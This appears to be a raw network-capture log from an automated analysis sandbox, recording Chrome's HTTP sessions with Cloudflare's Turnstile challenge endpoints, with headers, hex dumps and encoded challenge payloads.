                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:22 UTC143INHTTP/1.1 401 Unauthorized
                                                                        Date: Thu, 16 Jan 2025 08:20:22 GMT
                                                                        Content-Type: text/plain; charset=utf-8
                                                                        Content-Length: 1
                                                                        Connection: close
                                                                        2025-01-16 08:20:22 UTC2015INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 42 6f 41 2d 42 5f 43 44 43 54 74 51 61 69 58 6a 4c 4e 7a 49 75 79 58 66 32 74 37 42 74 4d 70 43 76 76 36 78 44 38 77 79 48 55 30 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                        Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gBoA-B_CDCTtQaiXjLNzIuyXf2t7BtMpCvv6xD8wyHU0AGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                        2025-01-16 08:20:22 UTC1INData Raw: 4a
                                                                        Data Ascii: J


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        19192.168.2.549737104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:23 UTC782OUTGET /cdn-cgi/challenge-platform/h/b/i/902caf840eaa7ce8/1737015620919/TS7ZMPQmxY7bcfQ HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: no-cors
                                                                        Sec-Fetch-Dest: image
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:23 UTC200INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:23 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 61
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        CF-RAY: 902caf9f2be44350-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:23 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1d 08 02 00 00 00 32 c6 4b 5b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                        Data Ascii: PNGIHDR2K[IDAT$IENDB`


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        20192.168.2.549739104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:24 UTC428OUTGET /cdn-cgi/challenge-platform/h/b/i/902caf840eaa7ce8/1737015620919/TS7ZMPQmxY7bcfQ HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:24 UTC200INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:24 GMT
                                                                        Content-Type: image/png
                                                                        Content-Length: 61
                                                                        Connection: close
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafa2fced32ee-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:24 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 1e 00 00 00 1d 08 02 00 00 00 32 c6 4b 5b 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                        Data Ascii: PNGIHDR2K[IDAT$IENDB`


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        21192.168.2.549740104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:24 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Content-Length: 32244
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        Content-type: application/x-www-form-urlencoded
                                                                        CF-Chl-RetryAttempt: 0
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        CF-Challenge: 1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://challenges.cloudflare.com
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:24 UTC16384OUTData Raw: 76 5f 39 30 32 63 61 66 38 34 30 65 61 61 37 63 65 38 3d 42 4a 59 6f 43 6e 53 74 2d 63 4a 76 4a 76 38 4a 53 79 53 63 50 77 47 74 76 69 53 53 68 4c 76 31 6f 59 2d 53 62 76 52 6f 63 71 76 30 76 71 2d 77 63 70 32 64 76 25 32 62 44 76 32 77 6f 76 4c 75 76 4a 6f 79 4a 76 49 57 53 6f 6e 54 76 50 39 6f 74 69 76 34 71 76 54 76 7a 71 76 74 68 6c 77 32 73 53 76 63 71 32 30 6f 44 46 32 32 70 35 58 76 46 57 52 76 74 6f 34 52 7a 52 30 24 71 76 64 76 6d 6d 46 42 38 38 79 76 76 70 2d 76 57 7a 76 76 57 74 6d 59 76 74 39 52 76 6e 62 52 4b 50 35 46 39 33 6f 53 2b 79 64 4a 71 44 67 44 70 4e 58 79 4b 59 42 6e 5a 6c 7a 6f 68 33 52 59 51 4f 71 7a 24 45 76 53 32 59 4f 79 79 46 52 2b 42 68 47 34 69 48 35 48 56 71 2d 53 42 79 65 72 39 34 6a 49 6c 55 24 64 56 56 50 32 44 39 65 61
                                                                        Data Ascii: v_902caf840eaa7ce8=BJYoCnSt-cJvJv8JSyScPwGtviSShLv1oY-SbvRocqv0vq-wcp2dv%2bDv2wovLuvJoyJvIWSonTvP9otiv4qvTvzqvthlw2sSvcq20oDF22p5XvFWRvto4RzR0$qvdvmmFB88yvvp-vWzvvWtmYvt9RvnbRKP5F93oS+ydJqDgDpNXyKYBnZlzoh3RYQOqz$EvS2YOyyFR+BhG4iH5HVq-SByer94jIlU$dVVP2D9ea
                                                                        2025-01-16 08:20:24 UTC15860OUTData Raw: 6b 51 68 52 4c 6f 4b 64 4f 74 52 52 4b 44 53 49 51 36 51 52 76 68 4a 34 6f 6e 59 76 67 76 68 4a 53 70 76 62 76 67 4b 6e 2d 50 7a 76 45 69 6e 79 76 6f 77 76 54 53 53 68 30 6f 42 2d 76 4d 70 76 38 76 59 32 6e 76 70 6f 42 2d 44 70 76 56 6f 63 2d 6e 41 76 58 76 53 2d 76 4e 76 54 6f 34 76 6e 68 76 73 6f 45 66 4a 6b 76 2b 6f 34 76 76 79 53 46 6d 59 77 32 45 55 4d 76 4f 2d 53 34 30 5a 71 47 57 57 47 30 2b 62 75 66 76 69 76 74 76 59 4a 32 45 55 2b 76 59 4a 6e 70 76 69 59 63 77 53 63 71 2b 76 46 6f 76 71 76 42 59 42 77 53 42 64 24 63 45 70 6e 6e 53 4c 7a 6f 44 6f 33 6e 31 4a 76 6f 32 4c 76 33 6f 46 70 6e 45 76 31 6f 68 76 32 6d 6b 4c 6f 59 4a 76 54 76 62 76 42 2d 53 64 76 47 6f 4f 5a 71 59 76 48 65 44 71 6e 5a 68 6a 76 34 6f 41 4f 59 6e 76 72 77 6e 6e 53 4e 71 72
                                                                        Data Ascii: kQhRLoKdOtRRKDSIQ6QRvhJ4onYvgvhJSpvbvgKn-PzvEinyvowvTSSh0oB-vMpv8vY2nvpoB-DpvVoc-nAvXvS-vNvTo4vnhvsoEfJkv+o4vvySFmYw2EUMvO-S40ZqGWWG0+bufvivtvYJ2EU+vYJnpviYcwScq+vFovqvBYBwSBd$cEpnnSLzoDo3n1Jvo2Lv3oFpnEv1ohv2mkLoYJvTvbvB-SdvGoOZqYvHeDqnZhjv4oAOYnvrwnnSNqr
                                                                        2025-01-16 08:20:24 UTC322INHTTP/1.1 200 OK
                                                                        Date: Thu, 16 Jan 2025 08:20:24 GMT
                                                                        Content-Type: text/plain; charset=UTF-8
                                                                        Content-Length: 26312
                                                                        Connection: close
                                                                        cf-chl-gen: 1aqtvMGvE3iVjqAHr0clIXzM5sKAMk0gjvDqooezNIybXTyPWg31R+WbioevD8fT$6++tjuCGiojUVZfCtuT6TQ==
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafa30c454366-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:24 UTC1047INData Raw: 6d 58 4b 53 70 70 6d 4a 73 62 32 56 6a 4c 6e 44 6d 36 47 37 75 4a 54 42 74 36 65 34 69 4d 65 72 76 49 7a 54 6e 4d 65 52 72 4d 72 42 71 4e 61 56 6d 61 33 4f 32 39 50 59 34 38 50 5a 75 4c 58 42 78 74 54 4d 31 73 57 35 36 61 62 46 7a 65 61 39 79 2b 65 2f 2b 64 6a 4f 2b 75 33 55 74 72 2f 75 34 62 76 35 2b 2b 44 47 77 2b 44 61 2b 39 38 44 35 4f 6b 4b 36 67 58 61 44 76 44 55 46 52 45 54 47 41 6e 70 39 65 6f 56 47 50 4d 51 47 76 51 6b 48 42 6e 35 38 78 49 43 4b 78 38 68 44 79 77 5a 48 69 6e 6c 45 43 62 79 42 69 49 75 4d 6a 48 36 4a 79 30 50 50 41 38 79 4c 6a 52 48 48 44 30 44 46 69 51 56 54 55 35 4f 4b 55 6f 49 44 45 6b 48 4a 6a 49 6b 49 54 70 4c 4d 6a 41 75 46 52 34 5a 49 6c 45 34 4c 53 59 2f 49 69 55 63 51 6a 39 70 59 30 64 6b 58 54 77 39 4d 32 4a 51 59 30 46
                                                                        Data Ascii: mXKSppmJsb2VjLnDm6G7uJTBt6e4iMervIzTnMeRrMrBqNaVma3O29PY48PZuLXBxtTM1sW56abFzea9y+e/+djO+u3Utr/u4bv5++DGw+Da+98D5OkK6gXaDvDUFRETGAnp9eoVGPMQGvQkHBn58xICKx8hDywZHinlECbyBiIuMjH6Jy0PPA8yLjRHHD0DFiQVTU5OKUoIDEkHJjIkITpLMjAuFR4ZIlE4LSY/IiUcQj9pY0dkXTw9M2JQY0F
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 75 70 4b 4c 43 79 49 6e 51 76 6f 36 78 6f 72 6d 30 7a 4a 61 79 6c 37 79 33 6e 4c 79 73 6e 73 33 4f 77 2b 62 6a 6f 75 71 33 36 37 33 69 70 39 76 45 34 4d 76 51 38 62 53 31 79 2f 4c 58 2b 76 62 7a 36 74 72 49 2b 75 76 54 37 4f 4c 58 38 41 72 62 43 4e 62 64 36 4d 6b 44 2b 67 77 46 37 4d 33 30 37 2b 6e 54 39 64 62 36 39 41 37 5a 49 51 33 78 49 50 37 66 34 76 30 59 33 77 4d 71 35 79 6f 42 43 4f 63 74 44 67 38 44 42 7a 54 2b 4b 7a 59 71 44 43 76 38 44 42 46 42 2b 66 34 67 50 6a 55 44 46 78 55 6f 50 44 51 36 49 45 38 70 54 7a 6c 49 48 6c 56 52 4e 46 5a 42 4f 54 52 46 55 30 38 57 58 6b 39 63 56 32 41 74 5a 43 55 6c 61 53 67 31 49 55 70 6e 4f 54 31 69 52 32 64 66 4d 45 77 7a 4e 31 64 56 52 6e 4e 31 4e 30 34 33 54 33 59 37 55 7a 35 54 58 33 57 49 67 47 42 63 65 46
                                                                        Data Ascii: upKLCyInQvo6xorm0zJayl7y3nLysns3Ow+bjouq3673ip9vE4MvQ8bS1y/LX+vbz6trI+uvT7OLX8ArbCNbd6MkD+gwF7M307+nT9db69A7ZIQ3xIP7f4v0Y3wMq5yoBCOctDg8DBzT+KzYqDCv8DBFB+f4gPjUDFxUoPDQ6IE8pTzlIHlVRNFZBOTRFU08WXk9cV2AtZCUlaSg1IUpnOT1iR2dfMEwzN1dVRnN1N043T3Y7Uz5TX3WIgGBceF
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 31 4d 44 58 71 4b 58 51 73 63 57 78 75 72 4c 62 33 75 47 61 34 61 50 5a 77 65 48 5a 76 4b 4f 6e 79 65 66 63 70 65 66 4d 34 64 48 53 30 38 76 6e 30 66 72 70 36 75 6d 34 32 4e 57 34 2b 4f 33 79 38 2f 48 50 30 38 4d 4a 2b 4f 6b 4a 35 39 66 66 41 73 6e 74 36 66 45 4c 38 39 58 78 46 74 62 55 39 2f 62 75 2b 42 55 67 48 42 62 73 49 75 4d 45 2f 43 6f 41 2b 4f 73 46 47 69 76 6d 2b 53 6b 42 42 65 38 48 49 77 77 6d 39 69 67 59 4b 53 6f 54 45 78 77 62 50 52 6b 53 51 55 41 43 47 2f 78 4a 4e 6a 6c 4f 51 56 45 77 4b 42 77 71 49 55 46 55 4c 6b 73 34 4f 54 49 79 50 31 63 76 50 31 52 63 59 55 45 39 4a 79 45 2b 61 44 38 6e 61 47 6c 71 53 79 68 74 62 6e 42 4a 65 45 6c 59 64 47 68 57 55 46 74 35 4e 6d 78 4d 67 6f 4e 6a 67 32 4a 43 64 33 2b 44 51 6e 68 76 57 6c 32 48 61 6d 31
                                                                        Data Ascii: 1MDXqKXQscWxurLb3uGa4aPZweHZvKOnyefcpefM4dHS08vn0frp6um42NW4+O3y8/HP08MJ+OkJ59ffAsnt6fEL89XxFtbU9/bu+BUgHBbsIuME/CoA+OsFGivm+SkBBe8HIwwm9igYKSoTExwbPRkSQUACG/xJNjlOQVEwKBwqIUFULks4OTIyP1cvP1RcYUE9JyE+aD8naGlqSyhtbnBJeElYdGhWUFt5NmxMgoNjg2JCd3+DQnhvWl2Ham1
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 63 61 6c 72 37 4f 7a 76 62 61 30 76 4e 6a 54 70 72 66 49 34 38 76 65 31 4e 6e 72 34 61 32 71 36 74 54 6e 39 62 37 77 72 74 4c 70 34 37 57 30 74 73 66 51 30 39 62 50 74 74 6a 34 76 77 48 7a 43 4f 55 4e 2b 4e 6b 42 45 4d 50 61 43 42 4c 76 39 77 48 79 44 66 66 31 39 78 48 72 37 66 37 59 47 67 34 54 33 79 51 6d 2b 67 55 63 4b 76 67 50 44 51 66 39 2b 68 38 4b 45 69 49 45 46 67 37 31 38 66 4c 7a 43 53 6b 54 4b 79 50 34 48 52 63 69 4e 45 63 41 52 45 45 43 43 6b 46 4e 4a 30 46 51 42 53 6b 39 4e 55 73 55 52 53 67 52 58 42 70 53 51 45 6b 75 53 79 77 78 4d 54 4e 56 50 45 5a 48 4e 30 68 49 4f 45 63 36 51 31 4e 53 55 57 6c 4a 51 48 64 79 57 33 42 6c 61 44 78 2b 64 30 6c 37 5a 44 78 41 56 57 64 58 67 6a 78 61 69 6d 78 46 65 48 39 39 68 32 5a 4c 55 46 57 47 67 35 43 53
                                                                        Data Ascii: calr7Ozvba0vNjTprfI48ve1Nnr4a2q6tTn9b7wrtLp47W0tsfQ09bPttj4vwHzCOUN+NkBEMPaCBLv9wHyDff19xHr7f7YGg4T3yQm+gUcKvgPDQf9+h8KEiIEFg718fLzCSkTKyP4HRciNEcAREECCkFNJ0FQBSk9NUsURSgRXBpSQEkuSywxMTNVPEZHN0hIOEc6Q1NSUWlJQHdyW3BlaDx+d0l7ZDxAVWdXgjxaimxFeH99h2ZLUFWGg5CS
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 44 66 33 4d 2b 35 7a 39 54 48 71 4f 75 30 6f 75 32 67 38 4f 7a 46 30 4d 57 2b 37 63 76 31 35 64 6a 4c 72 65 65 33 7a 37 66 75 34 4f 72 4f 38 64 33 6d 33 41 6a 69 32 39 50 62 33 73 58 6a 7a 2f 37 64 7a 68 54 53 41 78 55 45 41 74 6a 57 31 64 55 4b 43 66 45 62 34 64 6b 65 2b 2f 49 56 4b 75 45 41 44 42 66 38 42 69 33 75 4d 65 38 63 41 76 41 51 38 77 34 37 47 66 6b 32 4b 66 63 54 45 54 45 4e 48 54 67 56 49 41 51 7a 4b 7a 63 38 51 42 77 4d 51 45 52 49 55 6c 4a 49 45 6a 45 6b 53 78 56 50 52 55 74 53 45 53 6c 4c 51 6d 4d 39 55 31 74 54 4d 46 52 65 52 55 64 62 50 54 6c 42 59 56 70 41 4c 57 64 47 62 6e 5a 72 53 6b 68 78 63 56 39 7a 57 47 78 32 50 33 31 35 5a 31 78 2f 65 59 42 6f 68 48 64 65 64 31 68 36 59 32 56 63 67 59 78 70 5a 49 39 70 61 58 32 4d 57 32 79 55 6a
                                                                        Data Ascii: Df3M+5z9THqOu0ou2g8OzF0MW+7cv15djLree3z7fu4OrO8d3m3Aji29Pb3sXjz/7dzhTSAxUEAtjW1dUKCfEb4dke+/IVKuEADBf8Bi3uMe8cAvAQ8w47Gfk2KfcTETENHTgVIAQzKzc8QBwMQERIUlJIEjEkSxVPRUtSESlLQmM9U1tTMFReRUdbPTlBYVpALWdGbnZrSkhxcV9zWGx2P315Z1x/eYBohHded1h6Y2VcgYxpZI9paX2MW2yUj
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 64 78 64 6e 4a 32 72 36 67 33 75 44 6e 30 4d 66 4e 31 61 2f 6d 35 38 6e 62 2b 65 79 35 30 4f 37 71 30 64 7a 61 39 66 63 44 38 4f 4c 38 2f 64 37 73 41 74 76 35 37 63 30 4f 36 4f 2f 7a 34 77 6e 33 30 52 62 34 45 64 58 34 43 2f 72 75 43 2b 73 61 34 76 54 35 47 41 6f 71 2b 42 34 57 2f 50 73 67 4a 2f 77 48 4a 79 34 45 4e 69 67 4b 37 42 49 58 2b 54 6f 64 48 68 2f 36 45 53 55 6a 2b 43 63 70 50 55 49 37 4a 30 46 43 49 30 59 75 51 6a 4a 44 4a 77 6c 48 53 56 41 35 4d 44 59 2b 47 45 39 51 4d 6b 52 69 56 53 49 35 56 31 4d 36 52 55 4e 65 59 47 74 5a 54 6b 39 51 5a 46 56 53 56 47 42 59 63 57 5a 72 58 56 73 2f 55 6c 6f 2b 4f 31 52 69 66 46 46 31 66 32 71 44 57 58 35 61 62 57 57 48 63 6d 31 69 66 32 61 54 63 6f 39 35 5a 57 69 4f 57 56 74 7a 6c 56 71 41 67 59 53 43 68 4a
                                                                        Data Ascii: dxdnJ2r6g3uDn0MfN1a/m58nb+ey50O7q0dza9fcD8OL8/d7sAtv57c0O6O/z4wn30Rb4EdX4C/ruC+sa4vT5GAoq+B4W/PsgJ/wHJy4ENigK7BIX+TodHh/6ESUj+CcpPUI7J0FCI0YuQjJDJwlHSVA5MDY+GE9QMkRiVSI5V1M6RUNeYGtZTk9QZFVSVGBYcWZrXVs/Ulo+O1RifFF1f2qDWX5abWWHcm1if2aTco95ZWiOWVtzlVqAgYSChJ
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 33 63 37 6b 71 75 50 53 72 73 50 6d 31 75 33 4c 79 74 7a 77 74 75 66 66 39 64 50 73 35 4e 49 47 2b 4f 6a 41 39 66 76 71 41 51 72 36 37 2b 37 4b 42 50 54 4e 30 67 6a 78 30 75 63 4d 2b 2b 6f 65 45 51 48 2b 32 68 49 45 47 76 76 32 43 51 66 71 47 41 77 4c 4a 68 77 51 45 41 67 69 46 41 49 69 4a 78 67 49 42 43 30 63 39 54 6f 73 48 7a 59 51 4e 42 37 2b 46 44 45 70 4b 43 41 36 4c 51 63 63 50 54 46 47 4a 43 4d 31 4a 43 52 45 4e 30 31 61 53 6a 30 57 57 6c 46 42 47 55 35 53 52 54 4d 6e 56 45 67 33 49 31 6c 4d 4f 32 35 67 53 69 73 38 59 46 56 70 4c 32 6c 59 56 7a 64 6c 58 58 46 2b 54 32 46 50 4f 33 56 6c 50 31 42 30 61 57 65 47 66 57 78 46 65 6e 31 78 53 6f 71 42 64 49 6d 57 69 48 65 4f 63 49 52 32 56 32 79 4b 67 4a 56 6a 6b 34 56 30 63 4a 57 49 59 5a 61 5a 6a 58 79
                                                                        Data Ascii: 3c7kquPSrsPm1u3Lytzwtuff9dPs5NIG+OjA9fvqAQr67+7KBPTN0gjx0ucM++oeEQH+2hIEGvv2CQfqGAwLJhwQEAgiFAIiJxgIBC0c9TosHzYQNB7+FDEpKCA6LQccPTFGJCM1JCREN01aSj0WWlFBGU5SRTMnVEg3I1lMO25gSis8YFVpL2lYVzdlXXF+T2FPO3VlP1B0aWeGfWxFen1xSoqBdImWiHeOcIR2V2yKgJVjk4V0cJWIYZaZjXy
                                                                        2025-01-16 08:20:24 UTC1369INData Raw: 2b 58 4d 32 65 76 78 79 75 62 63 37 66 72 72 38 2f 6e 53 37 62 2f 31 41 2f 50 37 41 74 72 74 36 75 38 4b 36 63 72 76 38 51 76 68 45 67 76 78 30 75 66 74 43 41 62 6e 38 67 4c 39 44 68 51 46 38 52 37 66 48 2f 55 6d 48 77 62 6d 2b 78 38 4c 4a 42 2f 2b 45 69 34 45 43 78 6f 57 4a 6a 55 59 48 44 62 33 47 2f 6f 36 47 53 34 56 4a 45 45 6b 4b 45 6f 65 4a 30 41 36 51 79 35 47 4e 43 4d 32 53 54 68 4e 4d 68 4e 47 4f 6b 55 71 53 6c 59 2b 57 6a 41 33 54 55 4a 53 57 6b 4e 63 56 6d 4e 4b 59 6d 59 2f 57 57 56 55 62 55 34 76 63 6c 5a 69 52 6d 5a 32 57 6e 5a 4d 55 32 4a 4f 62 30 39 66 66 57 69 47 64 56 68 67 52 57 71 47 58 47 4e 36 58 6e 36 53 67 57 52 73 55 58 4f 4d 68 70 71 4a 62 48 42 5a 66 70 70 77 64 34 31 64 6b 71 61 56 65 48 78 6c 68 36 43 61 72 70 32 41 67 47 32 53
                                                                        Data Ascii: +XM2evxyubc7frr8/nS7b/1A/P7Atrt6u8K6crv8QvhEgvx0uftCAbn8gL9DhQF8R7fH/UmHwbm+x8LJB/+Ei4ECxoWJjUYHDb3G/o6GS4VJEEkKEoeJ0A6Qy5GNCM2SThNMhNGOkUqSlY+WjA3TUJSWkNcVmNKYmY/WWVUbU4vclZiRmZ2WnZMU2JOb09ffWiGdVhgRWqGXGN6Xn6SgWRsUXOMhpqJbHBZfppwd41dkqaVeHxlh6Carp2AgG2S


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        22192.168.2.549743104.18.95.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:24 UTC599OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        Accept: */*
                                                                        Sec-Fetch-Site: none
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
                                                                        2025-01-16 08:20:25 UTC442INHTTP/1.1 400 Bad Request
                                                                        Date: Thu, 16 Jan 2025 08:20:25 GMT
                                                                        Content-Type: application/json
                                                                        Content-Length: 14
                                                                        Connection: close
                                                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                        cf-chl-out: 2WZRNF3hXo+1E/iBqtV2GWBmoJm1rEvTytVEFjDb/rWvhd1vc28pbpvQbJcs3dhQP+HXktIeGFdq+QM2IvzruA==$bFSow6kGSbiUKoayOKpMNg==
                                                                        Server: cloudflare
                                                                        CF-RAY: 902cafa858bf0cc8-EWR
                                                                        alt-svc: h3=":443"; ma=86400
                                                                        2025-01-16 08:20:25 UTC14INData Raw: 7b 22 65 72 72 22 3a 31 30 30 32 33 30 7d
                                                                        Data Ascii: {"err":100230}


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        23192.168.2.549793104.18.94.414433504C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        2025-01-16 08:20:32 UTC1172OUTPOST /cdn-cgi/challenge-platform/h/b/flow/ov1/1605127115:1737012352:4BXwnbtKrd766rOBoKJPowV747GdyIl9mVNQ9Ho_ywc/902caf840eaa7ce8/1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c HTTP/1.1
                                                                        Host: challenges.cloudflare.com
                                                                        Connection: keep-alive
                                                                        Content-Length: 34621
                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                        Content-type: application/x-www-form-urlencoded
                                                                        CF-Chl-RetryAttempt: 0
                                                                        sec-ch-ua-mobile: ?0
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                        CF-Challenge: 1F5Cxy3acQDSD_maJ2Q.C7xfmqEQ185sOhiXUEHS_w8-1737015619-1.1.1.1-Yyo.hmxqCBlzU9CQF9n2ytO._FxQAZNm3xME0QZrqZYaRcPGbk12itfJZ8VfdD4c
                                                                        sec-ch-ua-platform: "Windows"
                                                                        Accept: */*
                                                                        Origin: https://challenges.cloudflare.com
                                                                        Sec-Fetch-Site: same-origin
                                                                        Sec-Fetch-Mode: cors
                                                                        Sec-Fetch-Dest: empty
                                                                        Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/p7h9d/0x4AAAAAAA5D2nHjAPlCZ2mF/auto/fbE/normal/auto/
                                                                        Accept-Encoding: gzip, deflate, br
                                                                        Accept-Language: en-US,en;q=0.9
